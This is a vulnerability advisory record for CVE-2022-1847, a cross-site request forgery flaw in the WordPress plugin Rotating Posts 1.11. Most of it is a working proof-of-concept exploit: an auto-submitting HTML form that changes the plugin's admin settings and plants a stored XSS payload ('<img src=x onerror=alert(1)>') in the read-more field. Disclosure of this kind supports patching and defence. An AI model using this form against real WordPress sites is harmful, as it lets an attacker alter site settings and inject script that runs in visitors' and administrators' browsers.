CVE: CVE-2022-1847

Name: Rotating Posts (rotating-posts)

Version: 1.11

Date: 2022-04-24 13:49:58

Advisory: https://wpscan.com/vulnerability/d34ed713-4cca-4cef-b431-f132f1b10aa6

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=rp-admin.php" method="POST">
    <input type="text" name="rp_submit_hidden" value="submit">
    <input type="text" name="rp_number_posts" value="5">
    <input type="text" name="rp_timer_sec" value="5">
    <input type="text" name="rp_read_more" value="<img src=x onerror=alert(1)>">
    <input type="text" name="rp_title" value="true">
    <input type="text" name="rp_date_time" value="true">
    <input type="text" name="rp_date_time_str" value="F jS, Y">
    <input type="text" name="rp_author" value="true">
    <input type="text" name="rp_author_prefix" value="by">
    <input type="text" name="rp_categories" value="true">
    <input type="text" name="rp_comments" value="true">
    <input type="text" name="rp_use_this_category" value="0">
    <input type="text" name="rp_left" value="https://example.com/wp-content/plugins/rotating-posts/images/left.jpg">
    <input type="text" name="rp_right" value="https://example.com/wp-content/plugins/rotating-posts/images/right.jpg">
    <input type="text" name="rp_pause_normal" value="https://example.com/wp-content/plugins/rotating-posts/images/pause.jpg">
    <input type="text" name="rp_pause_pressed" value="https://example.com/wp-content/plugins/rotating-posts/images/pause_on.jpg">
</form>
<script>
    document.forms[0].submit();
</script>